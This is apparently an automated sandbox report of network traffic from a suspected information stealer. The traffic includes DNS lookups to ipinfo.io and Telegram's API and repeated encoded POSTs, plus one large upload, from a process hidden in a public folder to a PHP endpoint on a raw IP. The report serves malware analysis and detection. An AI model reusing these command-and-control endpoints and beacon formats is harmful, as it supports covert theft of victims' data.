                                                                                                Oct 11, 2024 20:39:34.957971096 CEST5008980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:34.962899923 CEST80500895.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.100614071 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.242341995 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.242505074 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.310625076 CEST5008980192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.322803974 CEST80500895.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.322823048 CEST80500895.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.771018028 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.771222115 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.776443005 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.776586056 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.776637077 CEST80500885.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:35.776695013 CEST5008880192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.785021067 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:35.789894104 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.138816118 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:36.143831968 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.143858910 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.143876076 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.579437971 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.594669104 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:36.594721079 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.400033951 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.400151968 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.405483007 CEST80500905.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:37.405567884 CEST5009080192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.405843973 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:37.405988932 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.406117916 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.411068916 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:37.763725996 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:37.923161983 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:37.923269033 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:37.923427105 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:38.098081112 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:38.273564100 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:38.273700953 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.050756931 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.050976992 CEST5009280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.259716034 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:39.259741068 CEST80500915.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:39.259963989 CEST5009180192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.259982109 CEST5009280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.259982109 CEST5009280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.265069962 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:39.607671976 CEST5009280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.770451069 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:39.770889044 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:39.771028996 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:40.351897955 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:40.353585958 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:40.353708029 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:40.353719950 CEST5009280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:40.353854895 CEST5009280192.168.2.55.42.66.51
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 11, 2024 20:37:10.307019949 CEST | 57448 | 53 | 192.168.2.5 | 1.1.1.1
Oct 11, 2024 20:37:10.318670034 CEST | 53 | 57448 | 1.1.1.1 | 192.168.2.5
Oct 11, 2024 20:37:13.307430029 CEST | 63425 | 53 | 192.168.2.5 | 1.1.1.1
Oct 11, 2024 20:37:13.316646099 CEST | 53 | 63425 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 11, 2024 20:37:10.307019949 CEST | 192.168.2.5 | 1.1.1.1 | 0xbdca | Standard query (0) | ipinfo.io | A (IP address) | IN (0x0001) | false
Oct 11, 2024 20:37:13.307430029 CEST | 192.168.2.5 | 1.1.1.1 | 0x4f6 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 11, 2024 20:37:10.318670034 CEST | 1.1.1.1 | 192.168.2.5 | 0xbdca | No error (0) | ipinfo.io | | 34.117.59.81 | A (IP address) | IN (0x0001) | false
Oct 11, 2024 20:37:13.316646099 CEST | 1.1.1.1 | 192.168.2.5 | 0x4f6 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                • ipinfo.io
                                                                                                • api.telegram.org
                                                                                                • 5.42.66.51
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49798 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:34.078788996 CEST | 381 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 5.42.66.51
    Content-Length: 336
    Expect: 100-continue
    Connection: Keep-Alive
Oct 11, 2024 20:37:34.794745922 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:35.004265070 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:36.198700905 CEST | 1236 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 11 Oct 2024 18:37:35 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
Oct 11, 2024 20:37:38.070677042 CEST | 357 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 5.42.66.51
    Content-Length: 384
    Expect: 100-continue
Oct 11, 2024 20:37:38.287925005 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:38.513144016 CEST | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 11 Oct 2024 18:37:38 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49851 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:42.460701942 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 5.42.66.51
    Content-Length: 2552
    Expect: 100-continue
Oct 11, 2024 20:37:43.144619942 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:43.274619102 CEST | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 11 Oct 2024 18:37:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49852 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe

Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:42.540322065 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
    Host: 5.42.66.51
    Content-Length: 2052
    Expect: 100-continue
    Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:37:42.888708115 CEST2052OUTData Raw: 59 53 43 5c 5a 5a 50 5a 54 57 5b 54 52 5b 57 52 58 56 58 59 5b 5a 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YSC\ZZPZTW[TR[WRXVXY[ZUX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.$9?>8"*6Z$1"5X;'((2#(1S9.)[>1Y9;"_$,P,7
Oct 11, 2024 20:37:43.255204916 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:43.382978916 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:43 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 1e 21 01 01 16 29 33 3a 0f 3b 2a 32 0c 25 1c 3d 01 31 01 23 14 35 39 3f 03 39 2d 2c 0e 32 5c 3f 5b 2b 2c 2e 55 24 59 3c 00 27 11 2b 5d 0d 10 25 05 30 30 32 1c 2b 38 01 0c 2e 10 32 5f 25 2d 3a 5a 35 07 2f 51 22 07 3a 02 31 02 28 51 25 3d 29 1d 28 1a 32 05 3b 12 09 5f 25 2e 2f 55 0f 11 38 1c 27 3c 27 07 22 04 3f 55 34 06 24 5d 20 2c 3d 02 34 55 2c 00 24 2a 3c 03 27 3c 39 02 2a 30 27 1f 28 21 29 5d 26 04 29 1c 28 18 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989!)3:;*2%=1#59?9-,2\?[+,.U$Y<'+]%002+8.2_%-:Z5/Q":1(Q%=)(2;_%./U8'<'"?U4$] ,=4U,$*<'<9*0'(!)]&)("S."S2WM0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49864 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:44.435651064 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2052
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:44.795135975 CEST2052OUTData Raw: 59 5f 43 5d 5a 5f 55 5e 54 57 5b 54 52 5f 57 51 58 57 58 5b 5b 58 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_C]Z_U^TW[TR_WQXWX[[XU\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A094]=]1>6$09!&;;0$Z*;1#2-:=([-"_$,P,'


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49879 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:46.661664963 CEST | 382 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:37:47.015513897 CEST2552OUTData Raw: 5c 59 46 5a 5f 5b 55 5a 54 57 5b 54 52 5c 57 5d 58 5f 58 5d 5b 5e 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YFZ_[UZTW[TR\W]X_X][^UW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-0:7=;1?6('Y*!5#Y8)+&!;1Q.[&)7/;"_$,P,+
Oct 11, 2024 20:37:47.361632109 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:47.500583887 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:47 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49884 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:47.660424948 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:48.019743919 CEST2552OUTData Raw: 59 5a 43 5c 5f 53 55 5b 54 57 5b 54 52 5b 57 53 58 55 58 5c 5b 58 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YZC\_SU[TW[TR[WSXUX\[XUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C$_3)]:V*6<$?*\6%$/ $X>8*!;"--?"#9;"_$,P,7
Oct 11, 2024 20:37:48.372127056 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:48.509737968 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:48 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49886 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:47.862186909 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2052
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:48.216985941 CEST2052OUTData Raw: 59 5c 46 5d 5a 59 55 5c 54 57 5b 54 52 5f 57 54 58 52 58 5d 5b 55 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y\F]ZYU\TW[TR_WTXRX][UUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C0*/*82) _3*6%;8 \)(4;1Q.5*?.;"_$,P,'
Oct 11, 2024 20:37:48.543601990 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:48.670655012 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:48 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 59 22 11 01 5e 3d 0d 0b 1c 2f 2a 08 0e 26 31 3e 59 26 28 37 5a 35 5c 3c 11 2d 00 0e 0d 32 3a 3c 00 2a 2f 3a 1d 25 2f 27 5a 33 01 2b 5d 0d 10 26 5b 33 23 0c 58 2b 2b 24 56 2c 3e 32 59 30 3d 3e 15 21 58 27 1b 21 07 39 17 26 2f 3b 0a 31 04 39 56 3c 1a 29 58 3b 12 30 07 26 04 2f 55 0f 11 38 1c 25 2f 23 02 23 3e 24 0e 20 2c 34 59 34 3f 36 1d 34 0a 2b 11 25 04 33 1f 31 12 3e 13 2a 1d 2b 1d 3d 0c 25 17 25 04 29 12 3c 18 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989Y"^=/*&1>Y&(7Z5\<-2:<*/:%/'Z3+]&[3#X++$V,>2Y0=>!X'!9&/;19V<)X;0&/U8%/##>$ ,4Y4?64+%31>*+=%%)<"S."S2WM0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49896 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:48.937841892 CEST | 404 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: multipart/form-data; boundary=----I9nNPSHYdg1RY1Gju0uTq58PsHKk1qoBdy
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 119102
                                                                                                Expect: 100-continue
Oct 11, 2024 20:37:58.627657890 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:59.343909025 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0
Oct 11, 2024 20:37:59.351190090 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:37:59.562632084 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:59.968358040 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:59 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49902 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:49.704802036 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:50.081835985 CEST2156OUTData Raw: 5c 5d 46 5a 5a 59 55 5a 54 57 5b 54 52 5f 57 56 58 50 58 55 5b 55 55 5d 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \]FZZYUZTW[TR_WVXPXU[UU]_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C%*<Z>+?%''6!$.07)(#-.5Z*"+9"_$,P,'
Oct 11, 2024 20:37:50.539520025 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:50.557661057 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:50 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49913 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:51.616833925 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2140
Expect: 100-continue
Oct 11, 2024 20:37:51.966861963 CEST | 2140 | OUT | (request body)
Oct 11, 2024 20:37:52.320821047 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:52.451277971 CEST | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:37:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49926 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:53.494677067 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2156
Expect: 100-continue
Oct 11, 2024 20:37:53.841883898 CEST | 2156 | OUT | (request body)
Oct 11, 2024 20:37:54.191994905 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:54.328022957 CEST | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:37:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
